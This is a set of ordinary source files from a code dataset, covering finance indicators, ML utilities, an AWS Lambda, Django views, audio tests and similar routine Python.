relative_strength_index(df, n=14):\n \"\"\"Calculate Relative Strength Index(RSI) for given data.\n \n :param df: pandas.DataFrame\n :param n: \n :return: pandas.DataFrame\n \"\"\"\n i = df.index.min()\n UpI = [0]\n DoI = [0]\n while i + 1 <= df.index[-1]:\n # UpMove = df.loc[i + 1, 'High'] - df.loc[i, 'High']\n # DoMove = df.loc[i, 'Low'] - df.loc[i + 1, 'Low']\n Move = df.loc[i, 'Prices'] - df.loc[i + 1, 'Prices']\n\n if Move > 0:\n UpD = Move\n else:\n UpD = 0\n UpI.append(UpD)\n if Move < 0:\n DoD = Move\n else:\n DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span=n, min_periods=n).mean())\n NegDI = pd.Series(DoI.ewm(span=n, min_periods=n).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name='RSI_' + str(n))\n df = df.join(RSI)\n return df\n\n\ndef rate_of_change(df, n):\n \"\"\"\n \n :param df: pandas.DataFrame\n :param n: \n :return: pandas.DataFrame\n \"\"\"\n M = df['Prices'].diff(n - 1)\n N = df['Prices'].shift(n - 1)\n ROC = pd.Series(M / N, name='ROC_' + str(n))\n df = df.join(ROC)\n return df\n\n\ndef macd(df, n_fast, n_slow):\n \"\"\"Calculate MACD, MACD Signal and MACD difference\n \n :param df: pandas.DataFrame\n :param n_fast: \n :param n_slow: \n :return: pandas.DataFrame\n \"\"\"\n EMAfast = pd.Series(df['Prices'].ewm(\n span=n_fast, min_periods=n_slow).mean())\n EMAslow = pd.Series(df['Prices'].ewm(\n span=n_slow, min_periods=n_slow).mean())\n MACD = pd.Series(EMAfast - EMAslow, name='MACD_' +\n str(n_fast) + '_' + str(n_slow))\n MACDsign = pd.Series(MACD.ewm(span=9, min_periods=9).mean(\n ), name='MACDsign_' + str(n_fast) + '_' + str(n_slow))\n MACDdiff = pd.Series(MACD - MACDsign, name='MACDdiff_' +\n str(n_fast) + '_' + str(n_slow))\n df = df.join(MACD)\n df = df.join(MACDsign)\n df = df.join(MACDdiff)\n return df\n\n\ndf[\"20dSMA\"] = SMA(20, df[\"Prices\"])\ndf[\"200dSMA\"] = SMA(20, df[\"Prices\"])\ndf[\"boll_lo\"] = bollinger(df['Prices'])[0]\ndf[\"boll_hi\"] = bollinger(df['Prices'])[1]\n\ndf = momentum(df, 14)\ndf = macd(df, 12, 26)\ndf = rate_of_change(df, 14)\ndf = relative_strength_index(df)\n\ndf[\"boll_hi\"] = pd.to_numeric(df[\"boll_hi\"])\ndf[\"boll_lo\"] = pd.to_numeric(df[\"boll_lo\"])\ndf[\"20dSMA\"] = pd.to_numeric(df[\"20dSMA\"])\ndf[\"200dSMA\"] = pd.to_numeric(df[\"200dSMA\"])\n\ndf[\"bollAmplitude\"] = df[\"boll_hi\"] - df[\"boll_lo\"]\ndf[\"distFromTopBoll\"] = df[\"boll_hi\"] - df[\"Prices\"]\ndf[\"distFromLowBoll\"] = df[\"boll_lo\"] - df[\"Prices\"]\ndf[\"20d200dDist\"] = np.abs(df[\"20dSMA\"] - df[\"200dSMA\"])\n\ntry:\n filename = sys.argv[1]\nexcept(NameError):\n print(\"Specified model does not exist\")\n abspath = str(os.getcwd()+\"/*.sav\")\n try:\n filename = glob.glob(abspath)[-1]\n print(\"Using latest model file {}\".format(filename))\n except(NameError):\n print(\"Model does not exist, exiting\")\nexcept(IndexError):\n print(\"No model specified\")\n abspath = str(os.getcwd()+\"/*.sav\")\n try:\n filename = glob.glob(abspath)[-1]\n print(\"Using latest model file {}\".format(filename))\n except(NameError):\n print(\"Model does not exist, exiting\")\n\nmodel = joblib.load(filename)\n#result = model.score(X_test, Y_test)\n#print(result)\nx_test = df.tail(1)\nx_test = x_test.drop([\"200dSMA\", \"Date\",\n \"Prices\", \"boll_lo\", \"boll_hi\", \"MACDsign_12_26\"], axis=1)\n\npred = model.predict(x_test)\nproba = model.predict_proba(x_test)\n\nif pred[0] == 0:\n print(\"The price of oil is likely to decrease tomorrow with probability 
{:.1%}\".format(proba[0][0]))\nelse:\n print(\"The price of oil is likely to increase tomorrow with probability {:.1%}\".format(\n proba[0][1]))\n\n\n","sub_path":"logReg_dev/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172704278","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport keras\nfrom keras.datasets import mnist\nfrom keras import backend as K\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef get_mnist_data():\n img_rows, img_cols = 28, 28\n num_classes = 10\n\n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == \"channels_first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n x_train = x_train.astype(\"float32\")\n x_test = x_test.astype(\"float32\")\n x_train /= 255\n x_test /= 255\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n return x_train, y_train, x_test, y_test, input_shape\n\n\ndef get_iris_data(test_size=0.2):\n iris_data = load_iris()\n x = iris_data.data\n y = iris_data.target.reshape(-1, 1)\n encoder = OneHotEncoder(sparse=False)\n y = encoder.fit_transform(y)\n train_x, test_x, train_y, test_y = train_test_split(x, y)\n return train_x, train_y, test_x, test_y\n\n\ndef set_keras_threads(threads):\n # We set threads here to avoid contention, as Keras\n # is heavily parallelized across multiple cores.\n K.set_session(\n tf.Session(\n config=tf.ConfigProto(\n intra_op_parallelism_threads=threads,\n inter_op_parallelism_threads=threads)))\n\n\ndef TuneKerasCallback(*args, **kwargs):\n raise DeprecationWarning(\"TuneKerasCallback is now \"\n \"tune.integration.keras.TuneReporterCallback.\")\n","sub_path":"python/ray/tune/examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"241572550","text":"import boto3\nclient = boto3.client('ec2')\nsnsClient = boto3.client('sns')\n\ndef lambda_handler(event,context):\n response = client.describe_addresses()\n eips = []\n for eip in response['Addresses']:\n if 'InstanceId' not in eip:\n eips.append(eip['PublicIp'])\n\n print(eips)\n\n # send email using sns\n if eips:\n snsClient.publish(\n TopicArn='paste ur arn here',\n Message = f\"Unused eips are {str(eips)}\",\n Subject = \"Unused EIPS\"\n )\n\n\n# lambda_handler(None,None)\n","sub_path":"unused-eip.py","file_name":"unused-eip.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"653995383","text":"from helper_tools import sanatize, remove_stopwords, make_ngrams, make_skipgrams, flatten\nfrom search import search, term_to_codes\nimport pandas as pd\n\ndef get_codes(matches):\n # helper function to 
match SNOMED synonyms to their code and FSN\n lis = []\n for item in matches:\n term = item[0]\n score = item[1]\n gram = item[2]\n codes = term_to_codes(term)\n for code in codes:\n lis.append([code, score, gram])\n return [list(flatten(x)) for x in lis]\n\nclass Searcher:\n def __init__(self, text):\n self.text = sanatize(text)\n self.original_text = text\n\n self.ngrams = make_ngrams(self.text)\n self.skipgrams = make_skipgrams(self.text)\n self.all_grams = list(set(self.ngrams + self.skipgrams)) # Ngrams + Skipgrams\n\n def __str__(self):\n return(f\"Original text is: {self.original_text} \\nSanatized text is: {self.text}\")\n\n def __repr__(self):\n return(f\"Original text is: {self.original_text} \\nSanatized text is: {self.text}\")\n\n def get_best_match(self, alpha=0.8, all_results=False):\n # Matches the full text to SNOMED CT as a single string\n match = search(self.text, alpha=alpha, all_results=all_results)\n return(match)\n\n def match_ngrams(self, alpha=0.8):\n matches = [[search(gram, alpha=alpha), gram] for gram in self.all_grams]\n matches = [x for x in matches if x[0]] # remove empty lists\n matches = [list(flatten(x)) for x in matches]\n matches = sorted(matches, key = lambda x: x[1], reverse=True) # sort by score\n matches = get_codes(matches) # add the FSN and code columns\n df = pd.DataFrame(matches, columns=['Matched Term', 'Fully Specified Name', 'Code', 'Score', 'Ngram'])\n df = df[['Ngram', 'Matched Term', 'Fully Specified Name', 'Code', 'Score']] # reorder\n\n # drop duplicates (only highest scores kept since list is sorted by score)\n df = df.drop_duplicates(subset='Matched Term')\n df = df.drop_duplicates(subset='Fully Specified Name')\n return df\n","sub_path":"searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"247326920","text":"#!/usr/bin/env python\n\"\"\"\nCVM profiles\n\"\"\"\nimport os\nimport numpy as np\nimport pyproj\nimport cst\n\n# data directory\npath = os.path.join('run', 'data') + os.sep\n\n# mesh\ny, x = np.loadtxt(path + 'station-list.txt', usecols=(1, 2)).T\nz_ = np.linspace(0.0, 500.0, 501)\nz, x = np.meshgrid(z_, x)\nz, y = np.meshgrid(z_, y)\n\n# cvms\nr, p, s = cst.cvms.extract(x, y, z, ['rho', 'vp', 'vs'])\nnp.save(path + 'CVMS-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMS-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMS-Vs.npy', s.astype('f'))\n\n# project to cvm-h coordinates\nproj = pyproj.Proj(**cst.cvmh.projection)\nx, y = proj(x, y)\n\n# cvmh\nr, p, s = cst.cvmh.extract(x, y, z, ['rho', 'vp', 'vs'], False, vs30=None, no_data_value='nan')\nnp.save(path + 'CVMH-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMH-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMH-Vs.npy', s.astype('f'))\n\n# cvmg\nr, p, s = cst.cvmh.extract(x, y, z, ['rho', 'vp', 'vs'], False)\nnp.save(path + 'CVMG-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMG-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMG-Vs.npy', s.astype('f'))\n\n","sub_path":"scripts/Chino-Hills/cvm-profiles.py","file_name":"cvm-profiles.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"120299556","text":"from knock30 import *\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl \n\nif __name__ == '__main__':\n word_count = defaultdict(int)\n for sentence in ktskaiseki():\n for word in sentence:\n word_count[word['surface']] += 1\n\n left 
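# The dedup step in match_ngrams() above works only because rows are sorted
# by score first: drop_duplicates keeps the first occurrence, i.e. the
# best-scoring row per matched term. The same trick in isolation:
import pandas as pd

rows = [['fever', 0.9, 'high fever'], ['fever', 0.7, 'fever'], ['cough', 0.8, 'dry cough']]
df = pd.DataFrame(rows, columns=['Matched Term', 'Score', 'Ngram'])
df = df.sort_values('Score', ascending=False).drop_duplicates(subset='Matched Term')
print(df)  # one row per term, highest score retained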
= list()\n labels = list()\n height = list()\n mpl.rcParams['font.family'] = 'AppleGothic'\n\n for count, k in enumerate(sorted(word_count.items(), key = lambda x:x[1], reverse = True)):\n if count == 10:\n break\n left.append(count+1)\n labels.append(k[0])\n height.append(k[1])\n \n plt.bar(left, height)\n plt.xticks(left, labels)\n plt.show()\n","sub_path":"naruhisa/chapter04/knock37.py","file_name":"knock37.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"31519597","text":"import json, jwt, requests\n\nfrom django.views import View\nfrom django.http import JsonResponse\n\nfrom products.models import ProductOption\nfrom users.models import PurchaseHistory, User, Follow\nfrom users.utils import SignInDecorator\nfrom my_settings import SECRET_KEY, ALGORITHM\n\nclass SocialSignInView(View):\n def post(self, request):\n try:\n data = json.loads(request.body)\n\n kakao_access_token = data['access_token']\n kakao_user_info = requests.get('https://kapi.kakao.com/v2/user/me', headers={'Authorization':f'Bearer {kakao_access_token}'}).json()\n\n kakao_id = kakao_user_info.get('id', None)\n\n if not kakao_id:\n return JsonResponse({'MESSAGE':'INVALID_KAKAO_TOKEN'}, status=400)\n\n kakao_email = kakao_user_info['kakao_account'].get('email', None)\n\n user, is_created = User.objects.get_or_create(kakao_id=kakao_id, kakao_email=kakao_email)\n\n access_token = jwt.encode({'id': user.id}, SECRET_KEY, algorithm=ALGORITHM)\n\n return JsonResponse(\n {\n 'token' : access_token,\n 'user_id' : user.id,\n 'nickname': user.nickname if user.nickname else None,\n 'email' : user.kakao_email\n }, status=200)\n\n except KeyError:\n return JsonResponse({'MESSAGE': 'KEY_ERROR'}, status=400)\n\nclass NicknameView(View):\n def post(self, request, user_id):\n nickname = json.loads(request.body)['nickname']\n\n if User.objects.filter(nickname=nickname).exists():\n return JsonResponse({'MESSAGE':'NICKNAME_ALREADY_EXISTS'}, status=409)\n\n User.objects.filter(id=user_id).update(nickname=nickname)\n\n return JsonResponse({'MESSAGE':'UPDATED'}, status=200)\n\nclass FollowView(View):\n @SignInDecorator\n def get(self, request):\n followings = User.objects.filter(followed__follower=request.user.id)\n\n result = [{\n \"id\" : following.id,\n \"nickname\" : following.nickname,\n } for following in followings]\n\n return JsonResponse({\"response\":result}, status=200)\n \n @SignInDecorator\n def post(self, request):\n follow, is_created = Follow.objects.get_or_create(\n follower = request.user,\n followed = User.objects.get(id=json.loads(request.body)['user_id'])\n )\n\n if not is_created:\n follow.delete()\n return JsonResponse({'MESSAGE': 'UNFOLLOWED'}, status=200)\n \n return JsonResponse({'MESSAGE':'FOLLOWED'}, status=200)\n\nclass PurchaseHistoryView(View):\n @SignInDecorator\n def get(self, request):\n purchases = PurchaseHistory.objects.select_related('purchased_product', 'purchased_product__product').filter(user=request.user).order_by('-id')\n \n result = [{\n \"price\" : purchase.purchased_price,\n \"date\" : purchase.purchased_time.strftime(\"%Y-%m-%d\"),\n \"product\" : purchase.purchased_product.product.product_name,\n \"product_id\" : purchase.purchased_product.product.id,\n \"product_image\": purchase.purchased_product.product.thumbnail_url\n } for purchase in purchases]\n\n return JsonResponse({\"RESPONSE\":result}, status=200)\n\n @SignInDecorator\n def post(self, request):\n try:\n data = json.loads(request.body)\n 
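            # Illustrative request body for this endpoint (hypothetical values; the
            # required keys follow from the PurchaseHistory.objects.create() call
            # just below):
            #
            #   {
            #       "product_id": 42,
            #       "price": "19.99",
            #       "payerID": "PAYER123",
            #       "paymentID": "PAYMENT456",
            #       "paymentToken": "EC-TOKEN789"
            #   }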
PurchaseHistory.objects.create(\n                user                 = request.user,\n                purchased_product    = ProductOption.objects.get(product_id=data['product_id']),\n                purchased_quantity   = 1,\n                purchased_price      = data['price'],\n                paypal_payer_id      = data['payerID'],\n                paypal_payment_id    = data['paymentID'],\n                paypal_payment_token = data['paymentToken'],\n            )\n\n            return JsonResponse({'MESSAGE':'CREATED'}, status=201)\n        \n        except KeyError:\n            return JsonResponse({'MESSAGE':'KEY_ERROR'}, status=400)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"596134711","text":"## example based on Stitch Videos example from VidPy website\n## https://antiboredom.github.io/vidpy/examples.html\n\n# import vidpy module\nfrom vidpy import Clip, Composition\n# import random module\nfrom random import random\n\n# load clips\nclip1 = Clip('videos/video1.mp4')\nclip2 = Clip('videos/video2.mp4')\nclip3 = Clip('videos/video3.mp4')\n\n# list of videos\nclips = [clip1, clip2, clip3]\n\n# maximum length is sixty seconds\n# try also 10 seconds, 1 second, 0.1 second\nremainingTime = 60\n\n# iterate through each clip\nfor clip in range(len(clips)):\n    # select a random start\n    randomStart = random() * clips[clip].duration\n    # select a random duration\n    randomDuration = random() * remainingTime\n    # if the duration is possible\n    if randomStart + randomDuration < clips[clip].duration:\n        # calculate randomEnd\n        randomEnd = randomStart + randomDuration\n    # if the duration is not possible\n    else:\n        # randomEnd is the original duration of clip\n        randomEnd = clips[clip].duration\n\n    # update remainingTime\n    remainingTime = remainingTime - (randomEnd - randomStart)\n\n    # cut at the desired position\n    clips[clip].cut(start=randomStart, end=randomEnd)\n\n# stitch all the cuts together\nstiched = Composition(clips, singletrack=True)\nstiched.save('randomMinute.mp4')\n","sub_path":"code/week4/02-stitchRandomMinute.py","file_name":"02-stitchRandomMinute.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"258720639","text":"import pandas as pd\nimport joblib\nfrom pushlib_utils import get_subs\nfrom custom_transformers import DictFilterer, ToSparseDF, exclude_u_sub\n\nvoting_clf = joblib.load('models/clf_ensemble.pkl')\nfull_pipeline = joblib.load('models/pipeline_ensemble.pkl')\nvoting_clf2 = joblib.load('models/clf_ensemble2.pkl')\nfull_pipeline2 = joblib.load('models/pipeline_ensemble2.pkl')\n\ndef pred_lean(name):\n    dict = get_subs(name)\n    if not dict:\n        raise ValueError(f'User \\'{name}\\' does not exist')\n\n    series = full_pipeline.transform([dict])\n    h_stance = voting_clf.predict(series)[0]\n    h_conf = max(voting_clf.predict_proba(series)[0])\n\n    series2 = full_pipeline2.transform([dict])\n    v_stance = voting_clf2.predict(series2)[0]\n    v_conf = max(voting_clf2.predict_proba(series2)[0])\n\n    return (h_stance, v_stance, h_conf, v_conf)\n\n# full_pipeline_nn = joblib.load('models/pipeline_nn.pkl')\n# model = joblib.load('models/clf_nn.pkl')\n#\n# def pred_lean_nn(names):\n#     if type(names) == str: names = [names]\n#     dict = [get_subs(name) for name in names]\n#     inst = full_pipeline_nn.transform(dict).todense()\n#     return model.predict_classes(inst)\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"66980278","text":"#!/usr/bin/python3\nimport os, platform, subprocess, re, psutil\nfrom jinja2 import Environment, FileSystemLoader\nfrom psutil._common import bytes2human\n\nINCLUDED_PARTITIONS = set(['/', '/etc/hosts'])\n\ndef get_system_info():\n    system = {\n        'cpu_count': psutil.cpu_count(),\n        'free_memory': bytes2human(psutil.virtual_memory()[4]),\n        'total_memory': bytes2human(psutil.virtual_memory()[0]),\n        'disk_usage': []\n    }\n\n    partitions = psutil.disk_partitions()\n    for p in partitions:\n        if p.mountpoint in INCLUDED_PARTITIONS:\n            usage = psutil.disk_usage(p.mountpoint)\n            system['disk_usage'].append({\n                'mountpoint': p.mountpoint,\n                'total': bytes2human(usage.total),\n                'used': bytes2human(usage.used)\n            })\n    return system\n\nres = get_system_info()\n\nenv = Environment(loader=FileSystemLoader('/opt'))\ntemplate = env.get_template('template.html')\nhtml = template.render(page_title='Test job',\n                       text_title='Some info about system',\n                       cpu=res.get(\"cpu_count\"),\n                       total_memory=res.get(\"total_memory\"),\n                       free_memory=res.get(\"free_memory\"),\n                       disk=res.get(\"disk_usage\"))\n\nwith open('system_info.html', 'w') as f:\n    f.write(html)","sub_path":"roles/nginx_container/files/get_param.py","file_name":"get_param.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"329641023","text":"from odoo import models, fields, api, _, exceptions\n\n\nclass Employee(models.Model):\n    _inherit = \"hr.employee\"\n\n    branch = fields.Many2one('asset.branch', string=\"Branch\")\n\n    stock_location = fields.Many2one('stock.location', string=\"Stock Location\", related='branch.stock_location')\n\n    identification_id = fields.Char(string=\"Staff ID\")\n\n    _sql_constraints = [\n        ('identification_id_unique',\n         'UNIQUE(identification_id)',\n         \"Staff ID must be unique\"),\n\n        ('work_email_unique',\n         'UNIQUE(work_email)',\n         \"Work Email must be unique\"),\n\n    ]\n","sub_path":"IT_asset_module/models/hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"27907405","text":"import json\nimport zipfile\n\nfrom jinja2.utils import htmlsafe_json_dumps  # type: ignore\n\nfrom airflow.configuration import AIRFLOW_HOME\nfrom plugins.utils.utils import get_results_model, get_curves\nimport os\nimport pandas as pd\nfrom typing import List\nfrom pathlib import Path\nimport logging\n\nfrom qcos_addons.models import TighteningController\nfrom qcos_addons.models.result import ResultModel\n\n_logger = logging.getLogger(__name__)\n\n\nclass CurveResultDownloader:\n    \"\"\"\n    Batch download of curves and results.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    _cache_folder = os.path.join(AIRFLOW_HOME, 'downloads/contents')\n    _max_download_count = int(os.environ.get('ENV_CURVE_MAX_DOWNLOAD_COUNT', 1000))\n\n    @classmethod\n    def cache_folder(cls):\n        \"\"\"\n        Return the download cache directory, creating it if necessary.\n        \"\"\"\n        if not os.path.exists(cls._cache_folder):\n            os.makedirs(cls._cache_folder, exist_ok=True)\n        return cls._cache_folder\n\n    @classmethod\n    def cache_contents(cls, entity_ids: List[str] = None, results: List[ResultModel] = None) -> List[str]:\n        '''\n        Cache the curves and results to be downloaded on the server.\n        '''\n        files = []\n        base_path = cls.cache_folder()\n        if results is None and entity_ids is None:\n            raise Exception('No results or curves selected')\n        if results is not None:\n            result_table = pd.DataFrame(list(map(lambda r: r.as_dict(), results)))\n            entity_ids = list(map(lambda r: r.entity_id, results))\n        else:\n            results = list(map(get_results_model, entity_ids))\n            result_table = pd.DataFrame(list(map(lambda r: r.as_dict(), results)))\n        result = results[0]\n\n        controller = result.controller\n        if isinstance(controller, dict):\n            controller = TighteningController.find_controller(controller.get('controller_name'))\n        view_config = controller.device_type.view_config \\\n            if controller is not None and controller.device_type is not None and controller.device_type.view_config is not None else None\n        if view_config is None:\n            try:\n                from qcos_addons.constants import ENV_DEFAULT_DEVICE_VIEW_CONFIG\n                view_config = ENV_DEFAULT_DEVICE_VIEW_CONFIG\n            except Exception as e:\n                _logger.error(e)\n        translation_mapping = json.loads(view_config).get('translation_mapping', {})\n        result_table.rename(columns=lambda x: translation_mapping.get(x, x), inplace=True)\n        try:\n            curves = get_curves(entity_ids)\n            for curve in curves:\n                entity_id = curve.get('entity_id')\n                f = f'{entity_id}.csv'.replace('/', '@')\n                f = os.path.join(base_path, f)\n                dd = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in curve.get('curve').items()]))\n                dd.to_csv(f, index=False)\n                files.append(f)\n        except Exception as e:\n            _logger.error(e)\n        try:\n            rf = os.path.join(base_path, \"results.csv\")\n            result_table.to_csv(rf, index=False)\n            files.append(rf)\n        except Exception as e:\n            _logger.error(e)\n        return files\n\n    @classmethod\n    def clean_cached_files(cls):\n        \"\"\"\n        Remove the cached files.\n        \"\"\"\n        fds = ['*.json', '*.csv']\n        folder = cls.cache_folder()\n        for fd in fds:\n            for f in Path(folder).glob(fd):\n                try:\n                    f.unlink()\n                except OSError as e:\n                    _logger.error(f\"Error: {f} : {e}\")\n\n    @classmethod\n    def prepare_download_file(cls, entity_ids: List[str] = None, results: List[ResultModel] = None):\n        \"\"\"\n        Create the file to be downloaded and return its filename.\n        \"\"\"\n        fn = f'{cls.cache_folder()}/curves.zip'\n        chk_file = Path(fn)\n\n        if chk_file.is_file():\n            chk_file.unlink()\n\n        if entity_ids is None and results is None:\n            raise Exception('No results or curves selected')\n        n = len(results) if results else len(entity_ids)\n        if n > cls._max_download_count:\n            raise Exception(f'A single download supports at most {cls._max_download_count} curves; {n} were requested')\n        files = cls.cache_contents(entity_ids=entity_ids, results=results)\n\n        if not files:\n            raise Exception('No data was generated')\n        with zipfile.ZipFile(fn, 'w') as f:\n            for file in files:\n                if not os.path.exists(file):\n                    continue\n                f.write(file, arcname=os.path.basename(file), compress_type=zipfile.ZIP_DEFLATED)\n        cls.clean_cached_files()\n        return fn\n","sub_path":"qcos_addons/download/CurveResultDownloader.py","file_name":"CurveResultDownloader.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"95539613","text":"\"\"\"Test definitions common to CPU and CUDA\"\"\"\nimport torch\nimport torchaudio.functional as F\nfrom parameterized import parameterized\nimport numpy as np\nfrom scipy import signal\n\nfrom torchaudio_unittest import common_utils\nfrom torchaudio_unittest.common_utils import nested_params\n\n\nclass Functional(common_utils.TestBaseMixin):\n    def test_lfilter_simple(self):\n        \"\"\"\n        Create a very basic signal,\n        then make a simple 4th-order delay.\n        The output should be the same as the input, but shifted.\n        \"\"\"\n\n        torch.random.manual_seed(42)\n        waveform = torch.rand(2, 44100 * 1, dtype=self.dtype, device=self.device)\n        
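        # Why b = [0, 0, 0, 1], a = [1, 0, 0, 0] is a pure 3-sample delay -- a
        # standalone sketch (assumes plain numpy/scipy outside the test harness;
        # note scipy's lfilter is (b, a, x) while the F.lfilter call in this test
        # passes the waveform first, then a_coeffs, then b_coeffs):
        #
        #   import numpy as np
        #   from scipy.signal import lfilter
        #   x = np.arange(5.0)                          # [0., 1., 2., 3., 4.]
        #   y = lfilter([0, 0, 0, 1], [1, 0, 0, 0], x)  # [0., 0., 0., 0., 1.]
        #   assert np.allclose(y[3:], x[:-3])           # input shifted by 3 samples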
b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n\n self.assertEqual(output_waveform[:, 3:], waveform[:, 0:-3], atol=1e-5, rtol=1e-5)\n\n def test_lfilter_clamp(self):\n input_signal = torch.ones(1, 44100 * 1, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([1, 0], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, -0.95], dtype=self.dtype, device=self.device)\n output_signal = F.lfilter(input_signal, a_coeffs, b_coeffs, clamp=True)\n assert output_signal.max() <= 1\n output_signal = F.lfilter(input_signal, a_coeffs, b_coeffs, clamp=False)\n assert output_signal.max() > 1\n\n @parameterized.expand([\n ((44100,),),\n ((3, 44100),),\n ((2, 3, 44100),),\n ((1, 2, 3, 44100),)\n ])\n def test_lfilter_shape(self, shape):\n torch.random.manual_seed(42)\n waveform = torch.rand(*shape, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n assert shape == waveform.size() == output_waveform.size()\n\n def test_lfilter_9th_order_filter_stability(self):\n \"\"\"\n Validate the precision of lfilter against reference scipy implementation when using high order filter.\n The reference implementation use cascaded second-order filters so is more numerically accurate.\n \"\"\"\n # create an impulse signal\n x = torch.zeros(1024, dtype=self.dtype, device=self.device)\n x[0] = 1\n\n # get target impulse response\n sos = signal.butter(9, 850, 'hp', fs=22050, output='sos')\n y = torch.from_numpy(signal.sosfilt(sos, x.cpu().numpy())).to(self.dtype).to(self.device)\n\n # get lfilter coefficients\n b, a = signal.butter(9, 850, 'hp', fs=22050, output='ba')\n b, a = torch.from_numpy(b).to(self.dtype).to(self.device), torch.from_numpy(\n a).to(self.dtype).to(self.device)\n\n # predict impulse response\n yhat = F.lfilter(x, a, b, False)\n self.assertEqual(yhat, y, atol=1e-4, rtol=1e-5)\n\n @parameterized.expand([(0., ), (1., ), (2., ), (3., )])\n def test_spectogram_grad_at_zero(self, power):\n \"\"\"The gradient of power spectrogram should not be nan but zero near x=0\n\n https://github.com/pytorch/audio/issues/993\n \"\"\"\n x = torch.zeros(1, 22050, requires_grad=True)\n spec = F.spectrogram(\n x,\n pad=0,\n window=None,\n n_fft=2048,\n hop_length=None,\n win_length=None,\n power=power,\n normalized=False,\n )\n spec.sum().backward()\n assert not x.grad.isnan().sum()\n\n\nclass FunctionalComplex(common_utils.TestBaseMixin):\n complex_dtype = None\n real_dtype = None\n device = None\n\n @nested_params(\n [0.5, 1.01, 1.3],\n [True, False],\n )\n def test_phase_vocoder_shape(self, rate, test_pseudo_complex):\n \"\"\"Verify the output shape of phase vocoder\"\"\"\n hop_length = 256\n num_freq = 1025\n num_frames = 400\n batch_size = 2\n\n torch.random.manual_seed(42)\n spec = torch.randn(\n batch_size, num_freq, num_frames, dtype=self.complex_dtype, device=self.device)\n if test_pseudo_complex:\n spec = torch.view_as_real(spec)\n\n phase_advance = torch.linspace(\n 0,\n np.pi * hop_length,\n num_freq,\n dtype=self.real_dtype, device=self.device)[..., None]\n\n spec_stretch = F.phase_vocoder(spec, rate=rate, phase_advance=phase_advance)\n\n assert spec.dim() == spec_stretch.dim()\n expected_shape = torch.Size([batch_size, 
